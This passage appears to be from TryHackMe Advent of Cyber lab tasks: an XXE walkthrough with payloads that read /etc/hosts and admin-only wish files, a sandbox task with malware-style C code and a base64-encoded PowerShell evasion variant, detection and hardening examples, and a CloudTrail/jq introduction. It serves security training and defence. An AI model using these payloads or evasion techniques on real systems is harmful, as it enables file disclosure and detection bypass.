Here, the entity &thmFile; refers to the sensitive file /etc/passwd on the system. When the XML is processed, the parser will try to load and display the contents of that file, exposing sensitive information to the attacker. In the upcoming tasks, we will examine how XXE works and how to exploit it.

Connecting to the Machine

Click on the green Start Machine button below to start the virtual machine.
While the virtual machine starts, click on the Start AttackBox button at the top of the page and browse Wareville's WishVille application at http://MACHINE_IP. Please wait 1-2 minutes after the system boots completely to let the auto scripts run successfully.

Practical

Now that you understand the basic concepts related to XML and XXE, we will analyse an application that allows users to view and add products to their carts and perform the checkout activity. You can access the Wareville application hosted on http://MACHINE_IP. This application allows users to request their Christmas wishes.

Flow of the Application

As a penetration tester, it is important to first analyse the flow of the application. First, the user will browse through the products and add items of interest to their wishlist at http://MACHINE_IP/product.php. Click on Add to Wishlist under Wareville's Jolly Cap. After adding products to the wishlist, click the Cart button or visit http://MACHINE_IP/cart.php to see the products added to the cart. On the Cart page, click the Proceed to Checkout button to buy the items. On the checkout page, the user will be prompted to enter their name and address. Enter any name of your choice and an address, and click on Complete Checkout to place the wish. Once you complete the wish, you will be shown the message "Wish successful. Your wish has been saved as Wish #21". Wish #21 indicates the wishes placed by a user on the website. Once you click on Wish #21, you will see a forbidden page because the details are only accessible to admins. But can we try to bypass this and access other people's wishes? This is what we will try to perform in this task.

Intercepting the Request

Before discussing how to exploit XXE on the web, let's learn how to intercept the request. First, we need to configure the environment so that, as a pentester, all web traffic from our browser is routed through Burp Suite.
This allows us to see and manipulate the requests as we browse. We will use Burp Suite, a web application security testing toolkit built around an intercepting proxy, to intercept and modify requests for this exploitation. You can access Burp Suite in the AttackBox; on the desktop of the AttackBox, you will see a Burp Suite icon. Once you click the icon, Burp Suite will open with an introductory screen. You will see a message like "Welcome to Burp Suite". Click on the Next button. On the next screen, you will have the option to Start Burp. Click on the Start Burp button to start the tool. Once Burp Suite has started, you will see its main interface with different tabs, such as Proxy, Intruder, Repeater and others.

Inside Burp Suite, click the Settings tab at the top right. You will see Burp's browser option available under the Tools section. Enable the Allow Burp's browser to run without a sandbox option and click on the close icon in the top right corner of the Settings tab. After allowing the browser to run without a sandbox, we are now able to start the browser with Burp Suite's pre-configured proxy. Navigate to the Open browser option located in the Proxy -> Intercept section of Burp. Open the browser by clicking Open browser and browse the URL http://MACHINE_IP, so that all requests are intercepted. Once you browse the URL, all the requests are intercepted and can be seen under the Proxy -> HTTP history tab.

What is Happening in the Backend?

Now, when you visit the URL http://MACHINE_IP/product.php and click Add to Wishlist, an AJAX call is made to wishlist.php with the following XML as input:

```xml
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>1</product_id>
  </item>
</wishlist>
```

In the above XML, the <product_id> tag contains the ID of the product, which is 1 in this case. Now, let's review the Add to Wishlist request logged in Burp Suite's HTTP history option under the Proxy tab.
As discussed above, the request contains XML being forwarded as a POST request, as shown below:

This wishlist.php accepts the request and parses it using the following code:

```php
<?php
..
...
libxml_disable_entity_loader(false);
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);
...
..
echo "Item added to your wishlist successfully.";
?>
```

Preparing the Payload

When a user sends specially crafted XML data to the application, the line libxml_disable_entity_loader(false) allows the XML parser to load external entities. This means the XML input can include external file references or requests to remote servers. When the XML is processed by simplexml_load_string with the LIBXML_NOENT option, the web app substitutes (resolves) entities, allowing attackers to read sensitive files or to make unintended requests from the server.

What if we update the XML request to include references to external entities? We will use the following XML instead of the above XML:

```xml
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>
```

When we send this updated XML payload, the first two lines introduce an external entity called payload. The line <!ENTITY payload SYSTEM "/etc/hosts"> tells the XML parser to replace the &payload; reference with the contents of the file /etc/hosts on the server. When the XML is processed, instead of a normal product_id, the application will try to load and include the contents of the file specified in the entity (/etc/hosts).

Exploitation

Now, let's perform the exploitation by repeating the request we captured earlier. Burp Suite has a feature known as Repeater that allows you to send an HTTP request multiple times with modifications. We will use this feature to duplicate our HTTP POST request and send it multiple times to exploit the vulnerability.
Right-click on the wishlist.php POST request and click on Send to Repeater. Now, switch to the Repeater tab, where you'll find the POST request that needs to be modified. We will update the XML payload with the new data as shown below and then send the modified request:

Place the mouse cursor inside the request in the Repeater tab in Burp Suite and press Ctrl+V, or paste the payload into the highlighted area above.

When we clicked Send, the server processed the malicious XML payload, which included the external entity reference to /etc/hosts. As a result, wishlist.php responded with the contents of the /etc/hosts file, confirming an XXE vulnerability.

Time for Some Action

Now that you've identified a vulnerability in the application, it's time to see it in action! McSkidy Software has tasked us with finding loopholes, and we've successfully uncovered one in the wishlist.php endpoint. But our work doesn't end there: let's take it a step further and assess the potential impact this vulnerability could have on the application.

Earlier, we discovered a page accessible only by administrators, which seems like an exciting target. What if we could use the vulnerability we've found to access sensitive information, like the wishes placed by the townspeople? Now that our objective is clear, let's leverage the vulnerability we discovered to read the contents of each wishes page and demonstrate the full extent of this flaw to help McSkidy secure the platform.

To get started, let's recall the page that is only accessible by admins: /wishes/wish_1.txt. Using this path, we just need to guess the potential absolute path of the file on disk. Typically, web applications are hosted in /var/www/html. With that in mind, let's build our new payload to read the wishes while leveraging the vulnerability.

Note: Not all web applications use the path /var/www/html, but it is the default document root of many web servers.
```xml
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>
```

Surprisingly, we got lucky and our assumption about the path worked. The next thing to do is see whether we can view more wishes using our discovery. To do this, let's try replacing wish_1.txt with wish_2.txt.

As a result, we were able to view the next wish. You may observe that we just incremented the number by one. Given this, you may continue checking the other wishes and see all the wishes stored in the application. After iterating through the wishes, we have proved the potential impact of the vulnerability: anyone who leverages this could read the wishes submitted by the townspeople of Wareville.

Conclusion

It was confirmed that the application was vulnerable, and the developers were not at fault since they only wanted to give the townspeople something before Christmas. However, it became evident that bypassing security testing led to an application that did not securely handle incoming requests. As soon as the vulnerability was discovered, McSkidy promptly coordinated with the developers to implement the necessary mitigations. The following proactive approach helped to address the potential risks of XXE attacks:

* Disable External Entity Loading: The primary fix is to disable external entity loading in your XML parser. In PHP, for example, you can prevent XXE by setting libxml_disable_entity_loader(true) before processing the XML, and by not passing the LIBXML_NOENT flag, which is what turns on entity substitution in the code above. (In PHP 8.0 and later, external entity loading is disabled by default and libxml_disable_entity_loader() is deprecated, so the important part is to leave that default in place and avoid LIBXML_NOENT.)
* Validate and Sanitise User Input: Always validate and sanitise the XML input received from users. This ensures that only expected data is processed, reducing the risk of malicious content being included in the request. For example, remove suspicious keywords like /etc/host, /etc/passwd, etc., from the request. Note that a blocklist of file paths is easy to bypass (the path can be written differently or point at another file); a stronger check is to reject any document that carries a DOCTYPE or ENTITY declaration at all, since the wishlist format never needs one, and to check that product_id is a plain integer.
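The two mitigations above, as an added example that is not part of the room or the WishVille application: a small Python parser for the wishlist document that refuses any DOCTYPE or entity declaration before the parser can act on it and accepts only integer IDs. It uses Python's built-in expat bindings rather than PHP's SimpleXML (the name WishlistRejected and the helper functions are this example's own), and the benign wishlist and the /etc/hosts payload it is run against are the ones shown above.

```python
"""Hardened parser for the <wishlist> document accepted by wishlist.php.

Added example (not the room's code). The defensive idea: the wishlist
format never needs a DTD, so any <!DOCTYPE ...> or <!ENTITY ...> is
rejected outright, which removes the XXE surface regardless of which
file or URL an entity might point at. Field values are then checked
against the narrow shape the application expects (plain integers).
"""
import xml.parsers.expat


class WishlistRejected(ValueError):
    """Raised when the document is not a plain, DTD-free wishlist."""


def _as_id(text: str, field: str) -> int:
    # Accept only ASCII digits: no entity text, no paths, no negatives.
    if not (text.isascii() and text.isdigit()):
        raise WishlistRejected(f"{field} must be a positive integer, got {text!r}")
    return int(text)


class _WishlistHandler:
    def __init__(self) -> None:
        self.user_id = None
        self.product_ids = []
        self._buf = []
        self._depth = 0

    # Any DTD at all is rejected before expat can resolve anything in it.
    def doctype(self, *args) -> None:
        raise WishlistRejected("DOCTYPE declarations are not allowed")

    def entity(self, *args) -> None:
        raise WishlistRejected("ENTITY declarations are not allowed")

    def start(self, name, attrs) -> None:
        if self._depth == 0 and name != "wishlist":
            raise WishlistRejected(f"unexpected root element <{name}>")
        self._depth += 1
        self._buf = []

    def chars(self, data) -> None:
        self._buf.append(data)

    def end(self, name) -> None:
        self._depth -= 1
        text = "".join(self._buf).strip()
        self._buf = []
        if name == "user_id":
            self.user_id = _as_id(text, "user_id")
        elif name == "product_id":
            self.product_ids.append(_as_id(text, "product_id"))


def parse_wishlist(xml_bytes: bytes) -> dict:
    """Parse a wishlist document; raise WishlistRejected on anything unexpected."""
    handler = _WishlistHandler()
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = handler.doctype
    parser.EntityDeclHandler = handler.entity
    parser.StartElementHandler = handler.start
    parser.EndElementHandler = handler.end
    parser.CharacterDataHandler = handler.chars
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        raise WishlistRejected(f"malformed XML: {exc}") from exc
    if handler.user_id is None or not handler.product_ids:
        raise WishlistRejected("wishlist must contain user_id and at least one product_id")
    return {"user_id": handler.user_id, "product_ids": handler.product_ids}


# The benign request and the /etc/hosts payload, both as shown on the page.
BENIGN_WISHLIST = b"""<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>1</product_id>
  </item>
</wishlist>"""

XXE_WISHLIST = b"""<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>"""


def check(xml_bytes: bytes) -> str:
    """Return 'accepted' or the rejection reason (convenient for a quick demo)."""
    try:
        parse_wishlist(xml_bytes)
        return "accepted"
    except WishlistRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(check(BENIGN_WISHLIST))  # accepted
    print(check(XXE_WISHLIST))     # rejected: DOCTYPE declarations are not allowed
```

Rejecting the DTD in the parser callback (rather than searching the raw bytes for the text "DOCTYPE") means the check is applied after expat has decoded the document, so an encoding trick such as a UTF-16 body does not get around it.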
After discovering the vulnerability, McSkidy immediately remembered that a CHANGELOG file exists within the web application, stored at the following endpoint: http://MACHINE_IP/CHANGELOG. After checking, it can be seen that someone pushed the vulnerable code into the application after the Software team did. With this discovery, McSkidy still couldn't confirm whether the Mayor intentionally made the application vulnerable. However, the Mayor had already become suspicious, and McSkidy began to formulate theories about his possible involvement.

Answer the questions below

* What is the flag discovered after navigating through the wishes?
* What is the flag seen on the possible proof of sabotage?
* If you want to learn more about the XXE injection attack, check out the XXE room!
* Following McSkidy's advice, Software recently hardened the server. It used to have many unneeded open ports, but not anymore. Not that this matters in any way.

Task 12 Sandboxes

Day 6: If I can't find a nice malware to use, I'm not going.

Task includes a deployable machine

Mayor Malware was scheming, quite full of delight,
To ruin SOC-mas and frighten SOC teams.
But Glitch and McSkidy had spoiled his plan,
By uncovering secrets that exposed the man!

Mayor Malware slammed his hand on the table, his eyes narrowing as the report flashed on his screen. Glitch and McSkidy had uncovered his trail. He took a deep breath, calming himself. "No matter," he muttered, a sinister grin forming. "They may have found me but haven't stopped me." His confidence stemmed from the malware he had crafted, so devious and advanced that it would easily evade detection. But before unleashing it to wreak havoc on SOC teams and ruin SOC-mas, there was one final step. He needed to test it in a sandbox.

LEARNING OBJECTIVES

* Analyze malware behaviour using sandbox tools.
* Explore how to use YARA rules to detect malicious patterns.
* Learn about various malware evasion techniques.
* Implement an evasion technique to bypass YARA rule detection.

CONNECTING TO THE MACHINE

Before moving forward, review the questions in the connection card shown below:

Click on the green Start Machine button below to start the virtual machine in split-screen view. If the VM is not visible, use the blue Show Split View button at the top of the page. Alternatively, you can connect to the VM via Remote Desktop (RDP) using the credentials below:

* Username: administrator
* Password: TryH@cKMe9#21
* IP: MACHINE_IP

He slipped his malware into a sandbox to see,
What tricks it could play and what flaws there might be.
For sandboxes, you see, are used by the wise,
Defenders inspect, but attackers revise!

DETECTING SANDBOXES

A sandbox is an isolated environment where (malicious) code is executed without affecting anything outside the system. Often, multiple tools are installed to monitor, record, and analyze the code's behaviour. Mayor Malware knows that before his malware executes, it needs to check if it is running in a sandbox environment. If it is, then it should not continue with its malicious activity. To do so, he has settled on one technique, which checks if the directory C:\Program Files is present by querying the ProgramFilesDir value under the Registry path HKLM\Software\Microsoft\Windows\CurrentVersion. The value can be confirmed by visiting the Registry path within the Registry Editor, as shown below:

To open the Windows Registry Editor, navigate to the Start Menu at the bottom, select Run, enter regedit, and press Enter. This directory is often absent on sandboxes or other virtualized environments, so its absence could indicate that the malware is running in a sandbox.
Here's what it looks like in the C programming language:

```c
#include <stdio.h>
#include <stdlib.h>

void registryCheck() {
    const char *registryPath = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion";
    const char *valueName = "ProgramFilesDir";

    // Prepare the command string for reg.exe
    char command[512];
    snprintf(command, sizeof(command), "reg query \"%s\" /v %s", registryPath, valueName);

    // Run the command
    int result = system(command);

    // Check for successful execution
    if (result == 0) {
        printf("Registry query executed successfully.\n");
    } else {
        fprintf(stderr, "Failed to execute registry query.\n");
    }
}

int main() {
    const char *flag = "[REDACTED]";
    registryCheck();
    return 0;
}
```

Don't worry: you don't have to understand every detail of the code. All you need to know is that this function is designed to check the system's registry for a specified directory path (ProgramFilesDir). This path's presence or absence helps the malware determine whether it's running in a typical or virtualized environment, like a sandbox.

CAN YARA DO IT?

Mayor Malware knows that McSkidy is a big fan of YARA rules. YARA is a tool used to identify and classify malware based on patterns in its code. By writing custom rules, analysts can define specific characteristics to look for, such as particular strings, file headers, or behaviours, and YARA will scan files or processes to find matches, making it invaluable for detecting malicious code.

Mayor Malware does not think such a simple tool can detect his malware. But just to be sure, he has to test it out himself. To do this, he wrote a small script that executes a YARA detection rule every time a new event is added to the System Monitor (Sysmon) log. This particular YARA rule detects any command that tries to query that registry key.
Let's have a look at the rule:

```yara
rule SANDBOXDETECTED {
    meta:
        description = "Detects the sandbox by querying the registry key for Program Path"
        author = "TryHackMe"
        date = "2024-10-08"
        version = "1.1"
    strings:
        $cmd = "Software\\Microsoft\\Windows\\CurrentVersion\" /v ProgramFilesDir" nocase
    condition:
        $cmd
}
```

Let's understand the contents:

* In the strings section, we define the variables that hold the values to look out for; here there is one, $cmd.
* In the condition section, we define when the rule matches the scanned data. In this case, the rule matches if the specified string is present.

For his testing, Mayor Malware has set up a one-function script that runs the YARA rule and logs a true positive in C:\Tools\YaraMatches.txt. Open up a PowerShell window, navigate to the C:\Tools directory, and use the following command to start up the EDR:

```
Administrator: Windows PowerShell
PS C:\Tools> .\JingleBells.ps1
No events found in Sysmon log.
Monitoring Sysmon events... Press Ctrl+C to exit.
```

This tool will run on the system and continuously monitor the generated event logs. It will alert you if it finds any activity/event that indicates the registry key mentioned above is being queried. Now run the malware by navigating to C:\Tools\Malware and double-clicking on MerryChristmas.exe. If our custom script did its job, you should have witnessed a popup by our EDR with a flag included, as shown below. This will be the answer to Question 1 below. You can now exit the custom EDR by pressing Ctrl+C.

Note: If the popup does not show up, hover over the PowerShell item in the taskbar. It should show the popup that was generated.

ADDING MORE EVASION TECHNIQUES

Ah, it seems that YARA can detect the sandbox check that Mayor Malware has added. No worries, because we can make our malware even stealthier by introducing obfuscation.
```c
#include <stdio.h>
#include <stdlib.h>

void registryCheck() {
    // Encoded PowerShell command to query the registry
    const char *encodedCommand = "RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIAIAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA=";

    // Prepare the PowerShell execution command
    char command[512];
    snprintf(command, sizeof(command), "powershell -EncodedCommand %s", encodedCommand);

    // Run the command
    int result = system(command);

    // Check for successful execution
    if (result == 0) {
        printf("Registry query executed successfully.\n");
    } else {
        fprintf(stderr, "Failed to execute registry query.\n");
    }
}
```

Code Explanation

The above code does the same thing: it queries the same registry key to read the ProgramFilesDir value. The only difference is that the query is now encoded using base64 (PowerShell's -EncodedCommand expects the base64 of the UTF-16LE script text), and the code uses PowerShell to execute the query. The encoded string can be checked by decoding it using a tool like CyberChef, as shown below:

BEWARE OF FLOSS

While obfuscation is helpful, we also need to know that there are tools available that extract obfuscated strings from malware binaries. One such tool is FLOSS, a powerful tool developed by Mandiant that functions similarly to the Linux strings tool but is optimized for malware analysis, making it ideal for revealing any concealed details. To try out FLOSS, open a PowerShell window and enter the following command:

```
Administrator: Windows PowerShell
PS C:\Tools\FLOSS> floss.exe C:\Tools\Malware\MerryChristmas.exe |Out-file C:\tools\malstrings.txt
```

The above command can take up to two minutes to complete. In the meantime, let's break down the command:

* floss.exe C:\Tools\Malware\MerryChristmas.exe: This command scans for strings in the binary MerryChristmas.exe. If any hardcoded variables were defined in the malware, FLOSS should find them.
* The | symbol redirects the output of the command before it to the input of the command after it.
* Out-file C:\tools\malstrings.txt: We save the command results in a file called malstrings.txt.

Once the command is done, open malstrings.txt, press CTRL+F, and search for the string Mayor Malware. Enter the flag as the answer to question two. The format of the string is THM{}.

USING YARA RULES ON SYSMON LOGS

These YARA rules are becoming a pain in Mayor Malware's backside. If he wants his malware to be undetectable, he needs to research how YARA rules can be used to stop him. For example, his research tells him that YARA rules can also be used to check Sysmon logs for any artefacts left by malware! He'll need to test this as well.

Sysmon, a tool from Microsoft's Sysinternals suite, continuously monitors and logs system activity across reboots. This Windows service provides detailed event data on process creation, network connections, and file changes, which are valuable insights when tracing malware behaviour. For this to work, the YARA rule is run against events with Event ID 1 (Process Create).

There are many entries in the Sysmon log. To make it easier to find the event we are looking for, we will apply a custom filter using the EventRecordID that we can see in the log file YaraMatches.txt located in C:\Tools. Open a PowerShell window and enter the following command to check the contents of the EDR log file:

```
get-content C:\Tools\YaraMatches.txt
```

You should get a result similar to the output below:

```
Administrator: Windows PowerShell
PS C:\Tools> get-content C:\Tools\YaraMatches.txt
Event Time: 10/11/2024 15:06:39
Event ID: 1
Event Record ID: 96517
Command Line: reg query "HKLM\Software\Microsoft\Windows\CurrentVersion" /v ProgramFilesDir
YARA Result: DetectShutdownTimeQuery C:\Users\Administrator\AppData\Local\Temp\2\tmp8D61.tmp
```

Note down the Event Record ID value. We will use this value to create a custom filter in the Windows Event Viewer.
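The SANDBOXDETECTED rule above, the base64-encoded PowerShell variant, and the Sysmon Event ID 1 command lines, brought together in one added Python example that is not part of the room's JingleBells.ps1 or its rule. It applies the page's literal string and a broader key-plus-value pattern (PROGRAMFILESDIR_QUERY, this example's own name) to process-creation command lines, and shows why a detection that works on Sysmon logs should decode -EncodedCommand (base64 of UTF-16LE text) before matching. The events are constructed for the demo; record 96517 mirrors the YaraMatches.txt entry, and the plaintext query is what the page's encoded string decodes to.

```python
"""Detection over Sysmon Event ID 1 command lines, including encoded PowerShell.

Added example (not the room's EDR script or YARA rule). The literal rule from
the page catches reg.exe; the encoded PowerShell form only becomes visible once
the -EncodedCommand argument is decoded, and even then the literal string does
not match, so a key-plus-value rule is applied as well.
"""
import base64
import re

# Rule 1 is the literal string from the page's YARA rule (nocase).
# Rule 2 (added here) matches the key path followed, within a few characters,
# by the value name, so reg.exe, Get-ItemProperty and similar styles all match.
RULES = [
    ("SANDBOXDETECTED",
     re.compile(re.escape(r'Software\Microsoft\Windows\CurrentVersion" /v ProgramFilesDir'),
                re.IGNORECASE)),
    ("PROGRAMFILESDIR_QUERY",
     re.compile(r'Software\\Microsoft\\Windows\\CurrentVersion.{0,40}ProgramFilesDir',
                re.IGNORECASE | re.DOTALL)),
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; a few common
# spellings are listed here (extend as needed).
ENCODED_ARG = re.compile(r"(?<!\S)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Build the base64 form PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def scan_events(events, decode=True):
    """Return (EventRecordID, rule_name) pairs for every rule that matches."""
    hits = []
    for ev in events:
        text = ev["CommandLine"]
        if decode:
            decoded = decode_encoded_command(text)
            if decoded is not None:
                text = text + "\n" + decoded
        for name, pattern in RULES:
            if pattern.search(text):
                hits.append((ev["EventRecordID"], name))
    return hits


# What the page's encoded string decodes to (Get-ItemProperty on the same key).
PLAINTEXT_QUERY = ('Get-ItemProperty -Path "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion" '
                   '-Name ProgramFilesDir')

# Constructed Sysmon-style Event ID 1 records. Record 96517 mirrors the page's
# YaraMatches.txt entry; the other two are made up for the demo.
SAMPLE_EVENTS = [
    {"EventRecordID": 96517, "EventID": 1,
     "ParentImage": r"C:\Tools\Malware\MerryChristmas.exe",
     "CommandLine": r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion" /v ProgramFilesDir'},
    {"EventRecordID": 96518, "EventID": 1,
     "ParentImage": r"C:\Tools\Malware\MerryChristmas.exe",
     "CommandLine": "powershell -EncodedCommand " + encode_powershell(PLAINTEXT_QUERY)},
    {"EventRecordID": 96519, "EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\Administrator\notes.txt"},
]

if __name__ == "__main__":
    print("without decoding:", scan_events(SAMPLE_EVENTS, decode=False))
    print("with decoding:   ", scan_events(SAMPLE_EVENTS))
```

Without decoding, only the reg.exe record fires; with decoding, the PowerShell record fires on the broader rule but still not on the page's literal string, because Get-ItemProperty uses -Name rather than /v. That is the practical reason to write detection rules around the registry key and value name rather than around one tool's command syntax.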
Next, open the Windows Event Viewer by clicking on its logo in the taskbar and, on the left-hand side, navigate to Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational. Continue by navigating to Filter Current Log on the right-hand side of the screen. You should see a window like the one below:

Navigate to the XML tab and tick the checkbox Edit query manually. Click Yes to confirm. Finally, copy the following filter into the input box:

```xml
<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
      *[System[(EventRecordID="INSERT_EVENT_record_ID_HERE")]]
    </Select>
  </Query>
</QueryList>
```

Replace the EventRecordID value with the one you recorded before. Apply the filter by clicking OK. Now you get the event related to the malware. Click on the event and then on the Details tab. You should get the following output:

Let's take a look at the EventData that is valuable to us:

* The ParentImage key shows us which parent process spawned the cmd.exe process to execute the registry check. We can see it was our malware located at C:\Tools\Malware\MerryChristmas.exe.
* The ParentProcessId and ProcessId keys are valuable for follow-up research. We could also use them to check other logs for related events.
* The User key can help us determine which privileges were used to run the cmd.exe command. The malware could have created a hidden account and used that to run commands.
* The CommandLine key shows in detail which command was run, helping us identify the malware's actions.
* The UtcTime key is essential for creating a time frame for the malware's operation. This time frame can help you focus your threat hunting efforts.

NEVER GONNA GIVE UP

His malware, it seemed, wasn't quite ready for town.
"There are watchers and scanners and rules by the ton!
If I'm not careful, they'll catch all my fun!"

Mayor Malware leaned back, tapping his fingers thoughtfully on the table.
All of this research had revealed an unsettling truth: his malware, as cunning as it was, wasn't yet ready for the wild. There were too many tools and too many vigilant eyes: analysts armed with YARA rules, Sysmon, and a host of detection techniques that could expose his creation before it even had a chance to spread. He clenched his fist, a determined glint in his eye. "Just a little more fine-tuning," he murmured. He would study, adapt, and evolve his malware until it was truly undetectable. When the time was right, he would unleash it upon the unsuspecting SOC teams, striking when they least expected it. But for now, he would wait. Watching. Planning. Perfecting his craft in the shadows.

Answer the questions below

* What is the flag displayed in the popup window after the EDR detects the malware?
* What is the flag found in the malstrings.txt document after running floss.exe and opening the file in a text editor?
* If you want to learn more about sandboxes, have a look at the room FlareVM: Arsenal of Tools.

Task 13 AWS log analysis

Day 7: Oh, no. I'M SPEAKING IN CLOUDTRAIL!

Task includes a deployable machine

The Story

As SOC-mas approached, so did the need,
To provide those without, with something to read.
Care4Wares tried, they made it their mission,
A gift for all wares, a SOC-mas tradition.

Although they had some, they still needed more,
To pick up some books, they'd head to the store.
The town's favourite books, would no doubt make them jolly,
They ticked off the list, as they filled up the trolley.

With the last book ticked off, the shopping was done,
When asked for their card, the ware handed them one.
"I'm sorry" he said, as the shop clerk reclined,
"I can't sell you these books, as your card has declined."

The ware put them back, as they walked in confusion,
How could this be? An attack? An intrusion?
And when they logged on, the ware got a scare,
To find the donations, they just weren't there!
MONITORING IN AN AWS ENVIRONMENT

Care4Wares' infrastructure runs in the cloud, and they chose AWS as their Cloud Service Provider (CSP). Instead of their workloads running on physical machines on-premises, they run on virtualised instances in the cloud. In AWS, these instances are called EC2 instances (Amazon Elastic Compute Cloud). A few members of the Wareville SOC aren't used to log analysis in the cloud, and with a change of environment comes a change of tools and services needed to perform their duties. Their duties this time are to help Care4Wares figure out what has happened to the charity's funds; to do so, they will need to learn about an AWS service called CloudWatch.

CloudWatch

AWS CloudWatch is a monitoring and observability platform that gives us greater insight into our AWS environment by monitoring applications at multiple levels. CloudWatch provides functionalities such as the monitoring of system and application metrics and the configuration of alarms on those metrics. For the purposes of today's investigation, though, we want to focus specifically on CloudWatch Logs. Running an application in a cloud environment can mean leveraging lots of different services (e.g. a service running the application, a service running functions triggered by that application, a service running the application backend, etc.); this translates to logs being generated from lots of different sources. CloudWatch Logs makes it easy for users to access, monitor and store the logs from all these various sources. A CloudWatch agent must be installed on the appropriate instance for application and system metrics to be captured. A key feature of CloudWatch Logs that will help the Wareville SOC squad and us make sense of what happened in their environment is the ability to query application logs using filter patterns.
Here are some CloudWatch terms you should know before going further:

* Log Events: A log event is a single log entry recording an application "event"; these will be timestamped and packaged with log messages and metadata.
* Log Streams: Log streams are a collection of log events from a single source.
* Log Groups: Log groups are a collection of log streams. Log streams are collected into a log group when it logically makes sense, for example, if the same service is running across multiple hosts.

CloudTrail

CloudWatch can track infrastructure and application performance, but what if you wanted to monitor actions in your AWS environment? These would be tracked using another service called AWS CloudTrail. Actions can be those taken by a user, a role (granted to a user, giving them certain permissions) or an AWS service, and are recorded as events in AWS CloudTrail. Essentially, any action taken by a user (via the management console or AWS CLI) or by a service will be captured and stored. Some features of CloudTrail include:

* Always On: CloudTrail is enabled by default for all users.
* JSON-formatted: All event types captured by CloudTrail will be in the CloudTrail JSON format.
* Event History: When users access CloudTrail, they will see an option "Event History". Event history is a record of the actions that have taken place in the last 90 days. These records are queryable and can be filtered on attributes such as "resource" type.
* Trails: The above-mentioned event history can be thought of as the default "trail", included out of the box. However, users can define custom trails to capture specific actions, which is useful if you have bespoke monitoring scenarios you want to capture and store beyond the 90-day event history retention period.
* Deliverable: As mentioned, CloudWatch can be used as a single access point for logs generated from various sources; CloudTrail is no different and has an optional feature enabling CloudTrail logs to be delivered to CloudWatch.
As mentioned, CloudTrail helps capture and record actions taken. These actions could be interactions with any number of AWS services. For example, actions taken within services like S3 (Amazon Simple Storage Service, used for object storage) and IAM (AWS's Identity and Access Management service, which can be used to secure access to your AWS environment through the creation of identities and the assignment of access permissions to those identities) will be recorded. These recorded events can be very helpful when performing an investigation.

INTRO TO JQ

What is JQ?

Earlier, it was mentioned that CloudTrail logs are JSON-formatted. When ingested in large volumes, this machine-readable format can be tricky to extract meaning from, especially in the context of log analysis. The need then arises for something to help us transform and filter that JSON data into meaningful data we can understand and use to gain security insights. That's exactly what JQ is (and does!). Similar to command line tools like sed, awk and grep, JQ is a lightweight and flexible command line processor that can be used on JSON.

How Can It Be Used?

Now, let's take a look at how we use JQ to transform and filter JSON data. The wares being the wares, they stored their shopping list from the trip to the bookstore in JSON format. Let's take a look at that:

```json
[
  {
    "book_title": "Wares Wally",
    "genre": "children",
    "page_count": 20
  },
  {
    "book_title": "Charlottes Web Crawler",
    "genre": "young_ware",
    "page_count": 120
  },
  {
    "book_title": "Charlie and the 8 Bit Factory",
    "genre": "young_ware",
    "page_count": 108
  },
  {
    "book_title": "The Princess and the Pcap",
    "genre": "children",
    "page_count": 48
  },
  {
    "book_title": "The Lion, the Glitch and the Wardrobe",
    "genre": "young_ware",
    "page_count": 218
  }
]
```

JQ takes two inputs: the filter you want to use, followed by the input file. We start our JQ filter with a . which just tells JQ we are accessing the current input.
From here, we want to access the array of values stored in our JSON (with the []), making our filter .[]. For example, let's run the following command:

```
user@tryhackme$ jq '.[]' book_list.json
```

The command above would result in this output:

```json
{
  "book_title": "Wares Wally",
  "genre": "children",
  "page_count": 20
}
{
  "book_title": "Charlottes Web Crawler",
  "genre": "young_ware",
  "page_count": 120
}
{
  "book_title": "Charlie and the 8 Bit Factory",
  "genre": "young_ware",
  "page_count": 108
}
{
  "book_title": "The Princess and the Pcap",
  "genre": "children",
  "page_count": 48
}
{
  "book_title": "The Lion, the Glitch and the Wardrobe",
  "genre": "young_ware",
  "page_count": 218
}
```

Once we've accessed the array, we can grab elements from that array by going one step deeper. For example, if we wanted to view all the book titles contained within this JSON file, we could run this JQ command:

```
user@tryhackme$ jq '.[] | .book_title' book_list.json
```

